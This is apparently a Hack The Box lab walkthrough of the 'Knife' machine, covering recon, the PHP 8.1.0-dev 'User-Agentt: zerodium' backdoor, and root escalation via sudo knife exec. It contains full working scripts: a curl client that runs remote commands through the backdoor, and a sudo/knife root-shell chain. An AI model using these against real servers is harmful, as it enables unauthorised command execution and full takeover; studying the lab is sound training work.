HTB Knife Walkthrough

Get a quick walkthrough of the Knife machine provided by Hack The Box and learn how I owned it in less than 10 minutes.


Welcome to my first HTB walkthrough post. In this post, I will discuss how I owned this machine in less than 10 minutes. The machine is very beginner-friendly: it tests your Google search skills and is based on exploiting a trivial vulnerability that leads straight to a compromise of the server.

Link of the machine: https://app.hackthebox.eu/machines/Knife

Reconnaissance

I started with Nmap to find open ports and services, scanning every TCP port (-p-), skipping host discovery (-Pn) and probing service versions (-sV):

nmap -d -p- -Pn -sV -T4 10.10.10.242
Results of Nmap scan

In my experience SSH rarely gives up much without credentials, so let's skip it for now and focus on the HTTP port.

Website hosted on the HTTP port

Checking the application and running DirBuster with a wordlist of the 1000 most common directories and files turned up nothing, so we need to enumerate the service more thoroughly.

Let's start with the HTTP headers. If you are new to recon with Nmap, I have already written some articles on Secjuice; feel free to read those after this one.

nmap -p80 --script http-headers 10.10.10.242
Found vulnerable PHP version

Everything seemed OK, but the -dev suffix in the PHP version (8.1.0-dev, a development build that should never be exposed on a production server) looked juicy, so I searched Google for it.

Searching for the php exploit

The first result was sufficient to exploit this service. That build of PHP carried a planted backdoor: when a request contains a header named User-Agentt (note the double t) whose value starts with the string zerodium, the rest of the value is evaluated as PHP code, which gives an unauthenticated attacker command execution as the web server user.

Initial Foothold

After cloning the GitHub repository, execute the following script:

$ python3 backdoor_php_8.1.0-dev.py
Initial foothold POC


You can now go ahead and retrieve the user flag.
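As an added example (my own shell script, not the backdoor_php_8.1.0-dev.py from the repository above), here is a minimal client for that backdoor using curl. It assumes the target URL from the Nmap scan; the two marker strings and the base64 wrapping are my own choices so that the command output can be cut cleanly out of the page HTML that follows it, and so that quotes in the command never break the PHP.

```shell
#!/bin/sh
# Added example: minimal client for the PHP 8.1.0-dev backdoor (not the
# walkthrough's backdoor_php_8.1.0-dev.py). The backdoored build evaluates,
# as PHP, everything after the literal "zerodium" in a "User-Agentt" header.
# TARGET defaults to the box from the Nmap scan; the markers are made up here
# so the command output can be separated from the normal page body.

TARGET="${TARGET:-http://10.10.10.242/}"
MARK_S='__CMD_START__'
MARK_E='__CMD_END__'

# Build the User-Agentt value for one shell command. The command travels
# base64-encoded inside the PHP so quotes, $ and backslashes in it can never
# break the PHP string literal.
build_user_agentt() {
    b64=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf "zerodiumecho('%s');system(base64_decode('%s'));echo('%s');" \
        "$MARK_S" "$b64" "$MARK_E"
}

# Read a response body on stdin and print only the text between the markers.
# Exits 1 when the markers are absent, i.e. the header was not evaluated and
# the target is probably not the backdoored build.
extract_output() {
    awk -v s="$MARK_S" -v e="$MARK_E" '
        { buf = buf $0 "\n" }
        END {
            i = index(buf, s); if (i == 0) exit 1
            buf = substr(buf, i + length(s))
            j = index(buf, e); if (j == 0) exit 1
            printf "%s", substr(buf, 1, j - 1)
        }'
}

# Send the command and print its output; the exit status tells the caller
# whether the backdoor actually fired.
run_remote() {
    curl -s --max-time 10 -H "User-Agentt: $(build_user_agentt "$1")" "$TARGET" \
        | extract_output \
        || { echo "no markers in response: backdoor did not fire" >&2; return 1; }
}

# Usage: TARGET=http://10.10.10.242/ sh backdoor_client.sh 'id'
# (does nothing when no command is given, so the helpers can be sourced)
if [ $# -gt 0 ]; then
    run_remote "$1"
fi
```

Because the eval happens inside PHP, the same header also works as a quick detection probe: a normal PHP build ignores the unknown User-Agentt header and the markers never appear, which is exactly the case extract_output reports with a non-zero exit status.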

Privilege Escalation

The first technique in my Linux privilege-escalation toolbox is to check for and abuse sudo misconfigurations. To list the current user's sudo permissions, use sudo -l.

Sudo privileges check

Another Google search showed that knife is the command-line tool of Chef, an automation framework written in Ruby, and that its exec subcommand runs arbitrary Ruby scripts. Since sudo lets us run knife as root, any Ruby we hand to it runs as root too.

Knife exec subcommand documentation

Now all you have to do is:

  • Get an interactive shell using revshell_php_8.1.0-dev.py
  • Save a Ruby file that spawns a shell (https://netsec.ws/?p=337)
  • Execute it with knife under sudo to get the escalated shell
  • Retrieve the root user's flag
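Putting those steps together as an added example (my own script, not the walkthrough's): it parses the sudo -l output for a NOPASSWD rule naming knife, writes the Ruby one-liner to a temporary file and runs it through knife as root. The sudo -l sample used in testing and the temporary file path are constructed for the example; the real sudoers entry on a given box may look different.

```shell
#!/bin/sh
# Added example of the privilege-escalation chain (my own script, not the
# walkthrough's). Assumes `sudo -l` shows knife runnable as root with NOPASSWD;
# the temp-file location is an arbitrary choice.

# Read `sudo -l` output on stdin and print the knife binary allowed by a
# NOPASSWD rule (prints nothing if there is none, so the caller can bail out
# before ever invoking sudo).
knife_sudo_path() {
    awk '/NOPASSWD:/ { for (i = 1; i <= NF; i++) if ($i ~ /\/knife$/) { print $i; exit } }'
}

# Write the Ruby that knife will run: exec() replaces the ruby process, which
# is already running as root under sudo, with an interactive shell.
write_root_shell_rb() {
    printf 'exec "/bin/bash"\n' > "$1"
}

# Full chain. sudo -n never prompts, so a rule that needs a password fails
# fast instead of hanging a non-interactive web shell.
escalate() {
    knife=$(sudo -n -l 2>/dev/null | knife_sudo_path)
    [ -n "$knife" ] || { echo "no NOPASSWD sudo rule for knife" >&2; return 1; }
    script=$(mktemp /tmp/knife_exec.XXXXXX)
    write_root_shell_rb "$script"
    sudo "$knife" exec "$script"   # `knife exec SCRIPT` runs the Ruby file as root
}

# Usage: sh knife_privesc.sh go   (helpers only, no sudo, when run without "go")
if [ "${1:-}" = go ]; then
    escalate
fi
```

If you would rather not drop a file on disk, knife exec also accepts inline code with -E, so `sudo knife exec -E 'exec "/bin/bash"'` gives the same root shell in one line; the file-based form above matches what the walkthrough does.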

To learn more about how sudo works and how to exploit misconfigurations in the sudoers file, I recommend reading these two posts: Understanding sudo in Linux and Exploiting Sudo Misconfigurations.
